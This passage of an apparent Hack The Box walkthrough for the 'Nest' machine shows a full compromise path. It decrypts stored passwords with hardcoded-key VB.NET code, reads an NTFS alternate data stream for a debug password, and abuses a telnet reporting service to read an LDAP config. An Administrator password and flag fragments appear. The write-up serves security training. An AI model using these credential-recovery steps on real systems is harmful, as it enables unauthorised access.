Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function
End Class
root in WIP/RU/RUScanner ❯
|
Decrypting the Password
We can cut and patch some of this code together to make a single file we can run on dotnetfiddle
I put the hash I got early on the line run the line Return Decrypt
script. the decryption is happen here :
Decrypt(“HASH”, “N3st22”, “88552299”, 2, “464R5DFA5DL6LE28”, 256) so :
from :
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
|
to :
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
|
Execute this and we will get the password xRxRxPANCAK3SxRxRx
this is the final results :
Exploitation
Enumerate C.Smith
So now that I successfully decrypt the password. How about try to login it again in smbclient
:
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Users -U C.Smith Enter WORKGROUP\C.Smith's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Sun Jan 26 07:04:21 2020 .. D 0 Sun Jan 26 07:04:21 2020 Administrator D 0 Fri Aug 9 23:08:23 2019 C.Smith D 0 Sun Jan 26 15:21:44 2020 L.Frost D 0 Fri Aug 9 01:03:01 2019 R.Thompson D 0 Fri Aug 9 01:02:50 2019 TempUser D 0 Thu Aug 8 06:55:56 2019
\Administrator NT_STATUS_ACCESS_DENIED listing \Administrator\*
\C.Smith . D 0 Sun Jan 26 15:21:44 2020 .. D 0 Sun Jan 26 15:21:44 2020 HQK Reporting D 0 Fri Aug 9 07:06:17 2019 user.txt A 32 Fri Aug 9 07:05:24 2019
\L.Frost NT_STATUS_ACCESS_DENIED listing \L.Frost\*
\R.Thompson NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
\TempUser NT_STATUS_ACCESS_DENIED listing \TempUser\*
\C.Smith\HQK Reporting . D 0 Fri Aug 9 07:06:17 2019 .. D 0 Fri Aug 9 07:06:17 2019 AD Integration Module D 0 Fri Aug 9 20:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019
\C.Smith\HQK Reporting\AD Integration Module . D 0 Fri Aug 9 20:18:42 2019 .. D 0 Fri Aug 9 20:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 07:41:16 2019
|
so looks like i can now get the user.txt
as you can see on this line :
# bash
smb: \> cd C.Smith smb: \C.Smith\> ls . D 0 Sun Jan 26 15:21:44 2020 .. D 0 Sun Jan 26 15:21:44 2020 HQK Reporting D 0 Fri Aug 9 07:06:17 2019 user.txt A 32 Fri Aug 9 07:05:24 2019
\C.Smith\HQK Reporting . D 0 Fri Aug 9 07:06:17 2019 .. D 0 Fri Aug 9 07:06:17 2019 AD Integration Module D 0 Fri Aug 9 20:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019
\C.Smith\HQK Reporting\AD Integration Module . D 0 Fri Aug 9 20:18:42 2019 .. D 0 Fri Aug 9 20:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 07:41:16 2019
10485247 blocks of size 4096. 6544137 blocks available smb: \C.Smith\>
|
Grab the user flag
Finally I have now the user.txt
i downloaded it using smbclient
:
# bash
smb: \C.Smith\> mget user.txt Get file user.txt? y getting file \C.Smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \C.Smith\>
|
root in htb/boxes/Nest ❯ cut -c 4-12 user.txt b25404be
|
Privilege Escalation
So going to the firs enumeration of C.Smith
there’s a interesting .txt
file and executable HqkLdap.exe
as you see on this line :
# bash
\C.Smith\HQK Reporting . D 0 Thu Aug 8 19:06:17 2019 .. D 0 Thu Aug 8 19:06:17 2019 AD Integration Module D 0 Fri Aug 9 08:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019 HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019
\C.Smith\HQK Reporting\AD Integration Module . D 0 Fri Aug 9 08:18:42 2019 .. D 0 Fri Aug 9 08:18:42 2019 HqkLdap.exe A 17408 Wed Aug 7 19:41:16 2019
|
I initially came across the Debug Mode Password.txt
file and thought this could be used to authenticate to the DEBUG
mode of the HQK Reporting Service v1.2
service running on port 4386
we see this on our nmap
scan. The file appeared to have 0 bytes. I spent some time searching around further and couldn’t find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could potentially have had alternate streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file :
smb: \C.Smith\HQK Reporting\> more DEBUGM~1.TXT:Password:$DATA getting file \C.Smith\HQK Reporting\DEBUGM~1.TXT:Password:$DATA of size 15 as /tmp/smbmore.mFLHg4 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
WBQ201953D8w /tmp/smbmore.mFLHg4
smb: \C.Smith\>
|
if I run allinfo
on it, I can see something else:
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: Thu Aug 8 07:06:12 PM 2019 EDT access_time: Thu Aug 8 07:06:12 PM 2019 EDT write_time: Thu Aug 8 07:08:17 PM 2019 EDT change_time: Thu Aug 8 07:08:17 PM 2019 EDT attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes
❯ cat Debug\ Mode\ Password.txt:Password WBQ201953D8w
|
So this really interesting it shows password debug : WBQ201953D8w
this will be something useful later :
Enumeration with telnet
I’ll connect again to HQK
with telnet
in port 4386
and start digging. We can then use the password debug
to gain the ability to run the SHOWQUERY
command on the HQK Reporting Service. This functionality can be used to read files. After spending some time searching around I came across the Ldap.conf
file that is located in ../LDAP/
.
root in htb/boxes/Nest ❯ telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available >
Debug mode enabled. Use the HELP command to view additional commands that are now available >help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
>
|
I set the dir
to HQK
>setdir ..
Current directory set to HQK >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml
Current Directory: HQK >
Current Directory: HQK >setdir LDAP
Current directory set to LDAP >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe [2] Ldap.conf
Current Directory: LDAP >
|
I try to show the Ldap.conf
and it give us administrator credentials but the password looks like encrypted again .
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe [2] Ldap.conf
Current Directory: LDAP >showquery 2
Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>
|
Analyzing the HqkLdap.exe
I downloaded the HqkLdap.exe
and analyze it using JetBrains - dotPeek it is a free NET Decompiler and Assembly
smb: \C.Smith\HQK Reporting\AD Integration Module\> mget HqkLdap.exe Get file HqkLdap.exe? y getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec) smb: \C.Smith\HQK Reporting\AD Integration Module\>
|
Looking at CR Module
binary :
This contains the Arguments that we have to pass in the same script from which we Decrypted
the user hash
because the hash that we found in LDAP.conf
is encrypted using another method which we got in CR module(part)
and the arguments that we will pass in the decrypt function and compile it.
Debugging the HqkLdap.exe
Did you rember the vb script
that will decrypt the encryped password ? I use it again to decrypt also the admin password hash . I replace only this line :
from
Decrypt(“HASH”, “N3st22”, “88552299”, 2, “464R5DFA5DL6LE28”, 256)
"fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256
to :
Decrypt(“HASH”, “667912”, “1313Rf99”, 3, “1L1SA61493DRV53Z”, 256)
"yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256
This is the final script
# vb.net
Imports System.Text Imports System Imports System.Security.Cryptography Public Module Module1 Public Sub Main() Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)) End Sub Public Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function End Module
|
Copy and execute this in dotnetfiddle and we will get the password :
Administrator password : XtH4nkS4Pl4y1nGX
Grabbing the root.txt
Sadly we can’t use this in Evil-WinRM
we don’t have proper shell to get the root.txt
just only smbclient
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\c$ -U Administrator Enter WORKGROUP\Administrator's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> cd Users\Administrator\Desktop\ smb: \Users\Administrator\Desktop\> ls . DR 0 Sun Jan 26 15:20:50 2020 .. DR 0 Sun Jan 26 15:20:50 2020 desktop.ini AHS 282 Sun Jan 26 06:02:44 2020 root.txt A 32 Tue Aug 6 06:27:26 2019
10485247 blocks of size 4096. 6545433 blocks available smb: \Users\Administrator\Desktop\> get root.txt getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \Users\Administrator\Desktop\>
|
download the root.txt
and finally !
root in htb/boxes/Nest ❯ ls 'Debug Mode Password.txt' HqkLdap.exe IT 'Maintenance Alerts.txt' nmap-Nest Production Reports root.txt Shared user.txt 'Welcome Email.txt'
root in htb/boxes/Nest ❯ cut -c 4-12 root.txt c2eb084bc root in htb/boxes/Nest ❯
|
If you liked my writeup please leave a respect on my Profile
Referrences:
dotPeek - .NET Decompiler and Assembly
dotnetfiddle